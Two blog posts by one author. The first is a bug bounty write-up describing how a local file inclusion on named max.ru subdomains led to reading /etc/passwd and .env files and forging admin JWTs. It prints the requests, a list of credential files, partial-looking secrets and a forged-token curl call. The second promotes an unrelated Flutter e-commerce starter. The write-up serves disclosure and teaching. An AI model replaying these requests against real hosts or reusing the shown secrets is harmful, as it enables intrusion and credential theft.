🔍 From LFI to Full Infrastructure Compromise — A CVSS 9.0 Real-World Case Study

Dmitry Sorokin (@sorydima) — Thu, 14 Aug 2025 08:20:40 +0000

This is the story of how a seemingly simple Local File Inclusion (LFI) vulnerability escalated into a complete API and infrastructure compromise during a bug bounty engagement.

The vulnerability allowed me to retrieve sensitive configuration files from *.max.ru subdomains, extract credentials, forge authentication tokens, and ultimately access private APIs and source code repositories.

📺 PoC Video: YouTube
📂 Evidence & Full Report: Yandex Disk

1️⃣ Reconnaissance & Initial Finding

During reconnaissance of the max.ru domain, I focused on parameters likely to handle file input. Two subdomains stood out:

business.max.ru
help.max.ru

The file parameter behaved suspiciously. Testing with /etc/passwd returned actual system file contents — a classic LFI signature.

Example test:

GET https://business.max.ru/?file=/etc/passwd HTTP/1.1
Host: business.max.ru
User-Agent: Mozilla/5.0
Accept: */*

Response (truncated):

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin

The lack of sanitization allowed arbitrary local file reading.

2️⃣ Targeting High-Value Files

Once confirmed, I prioritized files with the highest potential impact:

File	Purpose	Potential Risk
`.env`	Environment variables	JWT secrets, DB creds, API keys
`config.php`	Application configuration	Database connection strings
`.git/config`	Git repo configuration	Repository URLs and tokens
`/var/www/html/config/database.php`	DB credentials	Full DB access
`/proc/self/environ`	Runtime env vars	Tokens in memory

Example request for .env:

GET https://help.max.ru/?file=/.env HTTP/1.1
Host: help.max.ru
User-Agent: curl/7.68.0
Accept: */*

Example response:

APP_ENV=production
DB_HOST=db.max.ru
DB_USER=max_prod
DB_PASSWORD=Sup3rS3cretPass
JWT_SECRET=4a9c9b8f8d2a46f83d8e70f...
GIT_TOKEN=ghp_7d9f4a8321b...

3️⃣ Secrets Obtained

The extracted configuration files revealed multiple high-value secrets:

JWT_SECRET — used to sign and validate authentication tokens
DB_USER / DB_PASSWORD — full database credentials
GitHub Personal Access Token — R/W access to private repositories
Third-party API keys — payment gateways, analytics, and internal tools

4️⃣ Exploiting the JWT_SECRET

With the JWT_SECRET, I could:

Forge my own valid JSON Web Tokens
Replay existing leaked tokens
Impersonate any user, including administrators

PoC request using forged token:

curl -H "Authorization: Bearer forged_admin_token" \
     https://api.oneme.ru/api/user

Result:
Private API endpoints returned data without any password authentication.

5️⃣ Impact Analysis

The vulnerability chain enabled:

Full API compromise — direct access to private endpoints
Database breach — ability to dump, alter, or delete data
Source code leak — private Git repos accessible with leaked tokens
Lateral movement — potential pivot to other internal services

Risk mapping (MITRE ATT&CK):

T1005 – Data from Local System
T1552.001 – Unsecured Credentials: Environment Variables
T1078 – Valid Accounts
T1550.003 – Use of Web Tokens

6️⃣ CVSS Scoring

Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
Score: 9.0 (Critical)

Breakdown:

AV:N — Network exploitable
AC:L — Low attack complexity
PR:N — No privileges required
UI:N — No user interaction required
S:C — Scope change (affects more than initial system)
C:H / I:H / A:H — High impact on confidentiality, integrity, and availability

7️⃣ Recommendations

Input Validation — Sanitize and whitelist file parameters.
Access Controls — Restrict sensitive files from public access via server config.
Secret Management — Remove production secrets from deployable code.
Token Rotation — Immediately rotate JWT secrets and API keys after exposure.
Logging & Monitoring — Detect suspicious file access patterns.

8️⃣ Key Takeaways for Bug Hunters

Never underestimate an LFI — the real impact is in what it reveals.
.env and config.php are gold mines for credentials.
JWT secrets are as sensitive as passwords — treat them accordingly.
Git tokens can expose entire source codebases.
Always think in terms of attack chains, not isolated bugs.

Keywords: LFI, Local File Inclusion, JWT Bypass, Token Replay, Auth Bypass, API Hack, Bug Bounty, Pentest, Web Security, CVSS 9.0, Security Research, Exploit

This case reinforces a core truth in offensive security:

A single weak link — if exploited fully — can unravel the entire security posture of an organization.

🚀 My Modus: Flutter + Dart starter for integration with Wildberries, Ozon and La Moda

Dmitry Sorokin (@sorydima) — Sat, 09 Aug 2025 14:20:11 +0000

Today, the brands that can sell in several channels at the same time are the winners.
We have developed My Modus — a ready-made open-source solution that allows you to launch an application for sales management on three major marketplaces at once in a few days: Wildberries, Ozon and La Moda.

📈 Why does a brand need integration with several marketplaces

Online trading has long gone beyond a single store.
Presence on several platforms:

Expands the audience — different marketplaces attract different segments of buyers.
Increases turnover — more entry points = more sales.
Reduces risks — a drop in sales on one platform is compensated by others.

But each platform has its own API, its own data format and requirements. We solved this problem by creating a single multi-channel e-commerce starter on Flutter + Dart.

🛠 Technologies and architecture

Frontend (Flutter):

Web + Mobile (iOS, Android) from one code
Multilingual (i18n)
Navigation via GoRouter
Adaptive design for any device

Backend (Dart Shelf):

Lightweight and fast HTTP server
PostgreSQL
JWT authentication (dart_jsonwebtoken)
Module for integration with marketplace APIs

DevOps:

CI/CD via GitHub Actions
Frontend autodeployment to GitHub Pages
Backend autodeployment to Render

🔌 Integration with marketplaces

Wildberries API

Catalog import
Updating balances and prices
Real-time order management
Example: Wildberries — My Modus

Ozon API

Automatic product publishing
Description and image synchronization
Logistics and delivery control

La Moda API

Fashion collection loading
Seasonal release support
Example: La Moda — My Modus

💡 Why Flutter + Dart

One language for frontend and backend
Flutter provides native speed on iOS, Android and Web
Shelf — minimalistic, fast and easily extensible server
Less time for development, easier support

👥 Who is this project for

Fashion brands — connecting several marketplaces from one application
Agencies — quick launch of e-commerce solutions for clients
Developers — a ready-made starter that can be supplemented and expanded

🚀 How to start

The My Modus project is open on GitHub:
🔗 https://github.com/sorydima/MyModusFlutter

You can:

Fork the repository
Add new marketplaces (AliExpress, Avito, Yandex.Market)
Make improvements via Pull Request

DEV Community: Dmitry Sorokin (@sorydima)